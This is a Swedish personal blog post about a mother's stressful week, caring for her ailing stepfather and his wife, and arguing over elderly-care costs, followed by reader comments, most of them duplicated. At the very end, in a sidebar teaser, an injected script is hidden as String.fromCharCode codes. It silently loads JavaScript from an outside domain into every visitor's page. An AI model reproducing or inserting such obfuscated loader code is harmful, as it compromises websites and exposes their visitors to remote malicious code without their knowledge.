Mitt liv just precis just nu…

Hej fining!

En uppdatering från dagen. Ett benpass på gymmet fick bli min start efter att jag lämnat Lilleman i skolan…. 

60D39A96-C548-4B80-850E-A7E4AB0C1757

Alltså jösses vad mina tankarna snurrar just nu…. Jag är helt slut just nu.

Känslorna svajar, och ”någon” där uppe prövar mig. Privat är det den ena utmaningen efter den andra 😅 Men jag andas,  Håller huvudet kallt och fokuserar👊🏻💪🏻

Nu ska jag behålla den här balansen som jag under år lyckta skapa …. Träning, kost, vila, återhämtning och BRA energier 💫 

Idag, Föräldramöte, varvat med boende och vårdplanering,  och avslutningsvis trivselkväll för 1:a klassarna ☺️ Sånguppvisning av våra barn, och fika på gräsmatta…..

0C994E96-099C-4BB9-ADE7-87911BF841E5F5734FC1-CB6A-4A0C-BFF2-34CB389B80DE25F321A5-E268-467D-A8C6-D232358BEB83

Ludvigs söta syskon var också med på trivselkvällen 💞 👆🏻✨ Vi hade tur med vädret och solen kom fram efter en halvdag med regn 🙏🏻😎

Min extrapappa. Att vara anhörig till någon som fått en stroke är svårt. Att dessutom samtidigt vara anhörig till någon som är dement, den kombinationen är nästan omöjlig😫😤😭

-Mitt hjärta går i tu för dessa människor!💔

Jag saknar ”MIN” extrapappa. Jag hade på något sätt räknat med att han alltid skulle finnas där och vara just….. som han är. Men tiderna förändras. Stroken förändrade allt. Åldern tar ut sin rätt….   Usch!

-Vi får små fina stunder tillsamman. Dessa tar jag verkligen vara på❤️

06774EA9-80B2-49CC-8CB1-83197BB12897

Jag har medvetet valt att inte skriva så mycket om min extrapappa… MEN. Nu kom det där bakslaget jag nästan väntat på. Vi tog ett gemensamt beslut om att att byta boende då det skulle göra att han och hans fru skulle få bo tillsammans….. På ett demens boende. Men det gynnar inte min extrapappa.

Han saknar intellektuellt sällskap. Han mår inget bra, och backar mentalt….. Han vill verkligen inte vara där, han vantrivs något fruktansvärt.

Han kan ringa mig upp till 30 gånger på en dag, och vill att jag ska hjälpa honom därifrån. Jag tycker SÅ synd om honom!

Så nu, många turer senare så diskuterar vi alternativen. Vi vill ju såklart att dom ska få bo tillsammans🙏🏻😭 Men dom har helt olika vårdbehov, och det är svårt att kombinera! FAN vad svårt!!!! Hur man än gör så drabbar det någon. DESSUTOM begriper jag mig inte på ”systemet”. Deras pensioner är en viss summa varje månad. Men boende kostanden är nästan DUBBELT upp.

-Hur går det ihop?! Det finns tydligen bidrag att söka, andra papper att fylla i. Men hur sjutton ska man som anhörig kunna lära sig allt detta? 🤷🏼‍♀️

En god man hade suttit fint, MEN det fick vi avslag på. Jag trodde det var tryggt att bli gammal i vårat land. Men det är det banne mig inte….. hmm. Men dom som jobbar med min extrapappa och fru hjälper till så gott dom kan. Snart kommer vi nog ha en ny lösning. 

9AC300BB-6142-4C1A-B5DA-1C24E06C09F3

Ja, som du förstår så är det liiite mycket nu. En flytt från Jonas med allt vad det innebär. Våran relation som är kantstött och behöver lugn & ro och en dos kärlek.  En Lilleman som behöver mig extra mycket just nu. En extrapappa och fru med hela deras situation, som behöver mig extremt mycket just nu. Jobb, träning, kost, vardag… Beslutet att säga upp mig från Lifestyle. En studio som ska börja växa fram….. -Ja, ni fattar 😉 Det är lite mycket nu😅.

Igår lämnade vi av Jonas vid flyget.  Dubbla känslor kring det också…  

Han med sitt band Basic element, är uppe i Rixgränsen, med Da Buzz och Günther bla. 

8D6D2527-30E9-4110-A5EA-FD6AB076CBED D7C91D52-6E53-4BCC-B8AB-87EE384A4541

Nu ska jag lägga mig och sova🙏🏻

Jag behöver Smälta alla intryck från diverse möten och samtal med hemtjänst, enhetschef, boendepersonal osv….😅 Så nu ska jag mina vitaminer och mineraler, gå och lägga mig tidigt och ladda om inför en ny dag.

När jag Lämnat Ludvig på skolan, åker jag direkt till gymmet. Träningen håller mig uppe just nu 😅 Den ger mig energi,m. Motivationen är inte på topp. MEN, det får mig att må SÅ mycket bättre, så det finns inga ursäkter 👊🏻

Jag har verkligen hittat min ”medicin” och min styrka i just styrketräningen 💪🏻

Naturen växer så det knakar just nu, syrenerna blommar och Öland visar dig från sin bästa sida✨

DCE94C53-DD27-4144-A979-99A56745DAD3

– Sov så gott fina du!

/My Martens 

54 Komentarer

 1. Usch vilken rörig situation du befinner dig i just nu. Kan verkligen relatera till den inre stressen jag gissar att du känner. Räddningen för mig är att strukturera, göra listor och göra en prioriteringsordning och inte tillåta mig att grubbla och klura på annat än det som måste prioriteras just nu. Inte helt lätt alla gånger dock och inte roligt att välja bort ”roliga” saker i extra stressiga perioder. Det kanske finns saker som du för stunden kan skala bort för att få extra tid över till det som måste bli gjort just nu?

  • Jag försöker att strukturera upp… Att prioritera det viktigaste först? ja, allt annat är borta, Mass-sms till vänner/närstående, ”lite mycket nu, inte bortglömd bara noll tid” Ja,du fattar…. Så visst gör jag det….

 2. Ansök om plats på äppelvägen eller rönninge, där de har både demens och somatisk vård. Kan ta tid bara, inte lätt att få två platser. Överklaga beslutet om god man? De borde vara berättigade båda två! Kämpa på!❤

 3. Ja en sak som är säker är att din stig i livet är inte spikrak o enkel direkt, men du klarar det oxå o kommer ut starkare ? gör mer utav det dom du mår bra utav ❤️

 4. Usch vilken rörig situation du befinner dig i just nu. Kan verkligen relatera till den inre stressen jag gissar att du känner. Räddningen för mig är att strukturera, göra listor och göra en prioriteringsordning och inte tillåta mig att grubbla och klura på annat än det som måste prioriteras just nu. Inte helt lätt alla gånger dock och inte roligt att välja bort ”roliga” saker i extra stressiga perioder. Det kanske finns saker som du för stunden kan skala bort för att få extra tid över till det som måste bli gjort just nu?

  • Jag försöker att strukturera upp… Att prioritera det viktigaste först😅 ja, allt annat är borta, Mass-sms till vänner/närstående, ”lite mycket nu, inte bortglömd bara noll tid” Ja,du fattar…. Så visst gör jag det….

 5. Ansök om plats på äppelvägen eller rönninge, där de har både demens och somatisk vård. Kan ta tid bara, inte lätt att få två platser. Överklaga beslutet om god man? De borde vara berättigade båda två! Kämpa på!❤

 6. Ja en sak som är säker är att din stig i livet är inte spikrak o enkel direkt, men du klarar det oxå o kommer ut starkare 💚 gör mer utav det dom du mår bra utav ❤️

 7. Åhh My, bara var rädd om dig i allt detta så det inte blir något bakslag. Har själv ett nu trodde inte jag skulle falla så djupt, korta små promenader är allt jag orkar och tårarna forsar. Jag vet att du förstår hur jobbigt det är…kram

 8. Hej My.
  Ja det är mycket att sätta sig in i när våra nära blir gamla och behöver vård. Men i vissa kommuner finns det typ seniorlotsar. Kolla om det finns i kommunen, för då kan du ställa alla frågor till dom och säkert få hjälp med vart du ska vända dig.
  Lycka till

 9. Åhh My, bara var rädd om dig i allt detta så det inte blir något bakslag. Har själv ett nu trodde inte jag skulle falla så djupt, korta små promenader är allt jag orkar och tårarna forsar. Jag vet att du förstår hur jobbigt det är…kram

 10. Hej My.
  Ja det är mycket att sätta sig in i när våra nära blir gamla och behöver vård. Men i vissa kommuner finns det typ seniorlotsar. Kolla om det finns i kommunen, för då kan du ställa alla frågor till dom och säkert få hjälp med vart du ska vända dig.
  Lycka till

 11. Det är mycket kring dig nu. Så tänk på att ta hand om dig själv och att BROMSA lite ibland.
  Ang din extrapappa så hoppas jag verkligen för hans skull att de kan få till en lösning där han kan trivas.
  Sen måste jag få fråga, menar du att deras boendekostnader är högre än deras pensioner? Tror nämligen inte det får vara så, utan de ska ha en liten slant kvar för eget bruk också.
  Vad motiverades avslaget om god man med?

 12. du är verkligen en dramaqueen. Jag tror inte du vill ha lugn och ro. Du letar efter saker som gör tillvaron krånglig, och du älskar det. Avslutar du någonsin det du påbörjat? Alla dessa ggr du flyttat, utbildningar du börjat och sen hoppat av, jobb du börjat och sen slutat, din studio blir förmodligen samma sak.

  • ?? Undra vem som är dramaqeen?? Du som skriver provocerande kommentarer bara för att få nån stackare att hålla med dig. Herregud, så barnsligt ??‍♀️??‍♀️??‍♀️

  • Utbildningar? En utbildning som jag valde att avsluta pga av ett jobberbjudande som jag fick dubbelt betalt på? ? jag valde att ta den chansen… gjorde det med bravu. Jag var i blosnterbrschen i 16 pr. 10.5 som egen…..
   Bloggen parallellt med allt annat sedan 2013, alltså snart 7 år. Flyttat. Jag, så blev det när jag blev lämnad. Jag kommer flytta hundra gånger till om det krävs, för Lillemans skull ❤️??
   Det är så lätt att sitta och dömma som du gör. Utan insikt. Och ganska ogenomtänkt, men i själva verket så är jag ganska övertygad om att du (och vissa andra) inte hade haft kraft/orka att göra det jag gör och gjort för Lilleman i de situationer som vi tagit oss igenom.
   Konkursen satte en press, MEN, tack vare mitt driv, och mitt egna företag. (Aktivt sedan 12 år) och olika jobb projekt så jag betat av mina skulder, och rest mig igen. Med både kapital, styrka och nya erfarenheter.
   Ingenting jag skäms över. Jag är stolt
   Över mig själv som klart mig så bra som jag gjort ?
   jag avslutar all mina projekt, när det är rätt tid att göra det.
   – Vad gör du själv som vet så mycket om hur det borde vara?

 13. Det är mycket kring dig nu. Så tänk på att ta hand om dig själv och att BROMSA lite ibland.
  Ang din extrapappa så hoppas jag verkligen för hans skull att de kan få till en lösning där han kan trivas.
  Sen måste jag få fråga, menar du att deras boendekostnader är högre än deras pensioner? Tror nämligen inte det får vara så, utan de ska ha en liten slant kvar för eget bruk också.
  Vad motiverades avslaget om god man med?

 14. du är verkligen en dramaqueen. Jag tror inte du vill ha lugn och ro. Du letar efter saker som gör tillvaron krånglig, och du älskar det. Avslutar du någonsin det du påbörjat? Alla dessa ggr du flyttat, utbildningar du börjat och sen hoppat av, jobb du börjat och sen slutat, din studio blir förmodligen samma sak.

  • 😂😂 Undra vem som är dramaqeen?? Du som skriver provocerande kommentarer bara för att få nån stackare att hålla med dig. Herregud, så barnsligt 🤦🏼‍♀️🤦🏼‍♀️🤦🏼‍♀️

  • Utbildningar? En utbildning som jag valde att avsluta pga av ett jobberbjudande som jag fick dubbelt betalt på? 😅 jag valde att ta den chansen… gjorde det med bravu. Jag var i blosnterbrschen i 16 pr. 10.5 som egen…..

   Bloggen parallellt med allt annat sedan 2013, alltså snart 7 år. Flyttat. Jag, så blev det när jag blev lämnad. Jag kommer flytta hundra gånger till om det krävs, för Lillemans skull ❤️👊🏻

   Det är så lätt att sitta och dömma som du gör. Utan insikt. Och ganska ogenomtänkt, men i själva verket så är jag ganska övertygad om att du (och vissa andra) inte hade haft kraft/orka att göra det jag gör och gjort för Lilleman i de situationer som vi tagit oss igenom.

   Konkursen satte en press, MEN, tack vare mitt driv, och mitt egna företag. (Aktivt sedan 12 år) och olika jobb projekt så jag betat av mina skulder, och rest mig igen. Med både kapital, styrka och nya erfarenheter.

   Ingenting jag skäms över. Jag är stolt
   Över mig själv som klart mig så bra som jag gjort 😊

   jag avslutar all mina projekt, när det är rätt tid att göra det.

   – Vad gör du själv som vet så mycket om hur det borde vara?

 15. Känns som det är för mycket nu igen och överallt många lösa trådar på samma gång låter verkligen hårt och komplicerat.

 16. Känns som det är för mycket nu igen och överallt många lösa trådar på samma gång låter verkligen hårt och komplicerat.

 17. Hamnade av en slump i ditt inlägg ”Därför flyttar jag ifrån Jonas”.
  Jag häpnar. Det angår väl ingen annan än Jonas varför du flyttar ifrån honom? Skulle du själv vilja bli avklädd offentligt i samband med en separation?

 18. Hamnade av en slump i ditt inlägg ”Därför flyttar jag ifrån Jonas”.

  Jag häpnar. Det angår väl ingen annan än Jonas varför du flyttar ifrån honom? Skulle du själv vilja bli avklädd offentligt i samband med en separation?

 19. Det trodde jag alla visste att Kommunen skinnar alla gamla så fort dom kommer in på ett boende. Har dom pengar så betalar dom högsta taxan som går tills pengarna är slut, sen blir det mindre.
  Inga gamla ska in på hem innan dom satt över alla sina besparingar och pengar till anhöriga eller dyligt. Kommunerna och vårt land äcklar mig.

 20. Det trodde jag alla visste att Kommunen skinnar alla gamla så fort dom kommer in på ett boende. Har dom pengar så betalar dom högsta taxan som går tills pengarna är slut, sen blir det mindre.

  Inga gamla ska in på hem innan dom satt över alla sina besparingar och pengar till anhöriga eller dyligt. Kommunerna och vårt land äcklar mig.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/